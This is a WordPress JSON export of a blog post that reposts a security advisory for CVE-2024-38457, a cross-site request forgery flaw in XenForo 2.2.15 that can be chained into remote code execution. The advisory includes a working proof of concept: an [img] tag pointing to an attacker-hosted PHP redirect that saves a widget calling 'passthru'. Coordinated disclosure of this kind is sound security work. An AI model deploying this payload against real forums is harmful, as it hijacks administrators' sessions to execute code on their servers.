{"id":58251,"date":"2024-07-17T21:31:36","date_gmt":"2024-07-17T18:31:36","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179585\/KIS-2024-05.txt"},"modified":"2024-07-17T21:31:36","modified_gmt":"2024-07-17T18:31:36","slug":"xenforo-2-2-15-cross-site-request-forgery","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/xenforo-2-2-15-cross-site-request-forgery\/","title":{"rendered":"XenForo 2.2.15 Cross Site Request Forgery"},"content":{"rendered":"<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br \/>XenForo &lt;= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<\/p>\n<p>[-] Software Link:<\/p>\n<p>https:\/\/xenforo.com<\/p>\n<p>[-] Affected Versions:<\/p>\n<p>Version 2.2.15 and prior versions.<\/p>\n<p>[-] Vulnerability Description:<\/p>\n<p>The XF\\Admin\\Controller\\Widget::actionSave() method, defined into the<br \/>\/src\/XF\/Admin\/Controller\/Widget.php script, does not check whether the<br \/>current HTTP request is a POST or a GET before saving a widget.<br \/>XenForo does perform anti-CSRF checks for POST requests only, as such<br \/>this method can be abused in a Cross-Site Request Forgery (CSRF)<br \/>attack to create\/modify arbitrary XenForo widgets via GET requests,<br \/>and this can also be exploited in tandem with KIS-2024-06 to perform<br \/>CSRF-based Remote Code Execution (RCE) attacks.<\/p>\n<p>Furthermore, XenForo implements a BB code system, as such this<br \/>vulnerability could also be exploited through &#8220;Stored CSRF&#8221; attacks by<br \/>abusing the [img] BB code tag, creating a thread or a private message<br \/>(to be sent to the victim user) like the following:<\/p>\n<p>[img]https:\/\/attacker.website\/exploit.php[\/img]<\/p>\n<p>Where the exploit.php script hosted on the attacker-controlled website<br \/>could be something like this:<\/p>\n<p>&lt;?php<\/p>\n<p>$url = &#8220;https:\/\/victim.website\/xenforo\/&#8221;;<\/p>\n<p>header(&#8220;Location:<br \/>{$url}admin.php?widgets\/save&amp;definition_id=html&amp;widget_key=RCE&amp;positions[pub_sidebar_top]=1&amp;display_condition=true&amp;options[template]={{\\$xf.app.em.getRepository(&#8216;XF\\\\Util\\\\Arr&#8217;).filterRecursive([&#8216;id&#8217;],&#8217;passthru&#8217;)}}&#8221;);<\/p>\n<p>?&gt;<\/p>\n<p>Successful exploitation of this vulnerability requires a victim user<br \/>with permissions to administer styles or widgets to be currently<br \/>logged into the Admin Control Panel.<\/p>\n<p>[-] Solution:<\/p>\n<p>Update to a fixed version or apply the vendor patches.<\/p>\n<p>[-] Disclosure Timeline:<\/p>\n<p>[22\/02\/2024] &#8211; Vulnerability details sent to SSD Secure Disclosure<br \/>[05\/06\/2024] &#8211; Vendor released patches and fixed versions<br \/>[14\/06\/2024] &#8211; CVE identifier requested<br \/>[16\/06\/2024] &#8211; CVE identifier assigned<br \/>[16\/07\/2024] &#8211; Coordinated public disclosure<\/p>\n<p>[-] CVE Reference:<\/p>\n<p>The Common Vulnerabilities and Exposures project (cve.mitre.org) has<br \/>assigned the name CVE-2024-38457 to this vulnerability.<\/p>\n<p>[-] Credits:<\/p>\n<p>Vulnerability discovered by Egidio Romano.<\/p>\n<p>[-] Other References:<\/p>\n<p>https:\/\/xenforo.com\/community\/threads\/222133<br \/>https:\/\/ssd-disclosure.com\/ssd-advisory-xenforo-rce-via-csrf\/<\/p>\n<p>[-] Original Advisory:<\/p>\n<p>http:\/\/karmainsecurity.com\/KIS-2024-05<\/p>\n","protected":false},"excerpt":{"rendered":"<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-XenForo &lt;= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;- [-] Software Link: https:\/\/xenforo.com [-] Affected Versions: Version 2.2.15 and prior versions. [-] Vulnerability Description: The XF\\Admin\\Controller\\Widget::actionSave() method, defined into the\/src\/XF\/Admin\/Controller\/Widget.php script, does not check whether thecurrent HTTP request is a POST or a GET before saving a widget.XenForo does perform anti-CSRF checks for POST requests only, &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-58251","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58251","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=58251"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58251\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=58251"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=58251"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=58251"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}